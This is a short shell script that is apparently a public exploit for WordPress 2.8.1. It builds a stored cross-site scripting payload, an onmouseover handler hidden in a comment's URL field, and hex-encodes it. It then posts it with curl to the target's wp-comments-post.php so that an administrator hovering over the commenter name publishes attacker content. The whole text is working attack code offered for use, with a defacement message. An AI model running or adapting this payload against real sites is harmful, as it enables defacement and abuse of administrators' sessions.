echo "wp281.quickprz // iso^kpsbr"
SITE=$1 COMMENT=$2 MESSAGE="h4x0riZed by the superfreakaz0rz"
if [ "X$SITE" = "X" ]; then echo "$0 <url> [postID]" echo "f.e. $0 www.worstpress.eu" exit fi
if [ "X$POSTID" = "X" ]; then POSTID=1 fi
echo "[+] building payload"
WHERE="title" # can also be 'content' PATH="$SITE/wp-comments-post.php"
WHERE=`echo -n "$WHERE" | /usr/bin/od -t d1 -A n | /bin/sed 's/\\s\\s*/,/g' | /bin/sed 's/^,//'` EVILURL="http://w.ch'onmouseover='document.getElementById(String.fromCharCode($WHERE)).value=this.innerHTML;document.getElementById(String.fromCharCode(112,117,98,108,105,115,104)).click();" echo "[-] payload is $EVILURL for '$MESSAGE'"
EVILURL=`echo -n "$EVILURL" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %` MESSAGE=`echo -n "$MESSAGE" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %` RNDDATA=`/bin/date +%S%s`;
echo "[!] delivering data" /usr/bin/curl -A "Quickprz" -d "author=$MESSAGE&email=kelly@hackforums.net&url=$EVILURL&comment=hi+there%5F+this+is+just+some+very+harmless+spam+$RNDDATA&submit=Submit+Comment&comment_post_ID=$POSTID" $PATH
echo "[X] all done. now wait for admin to mouse-over that name."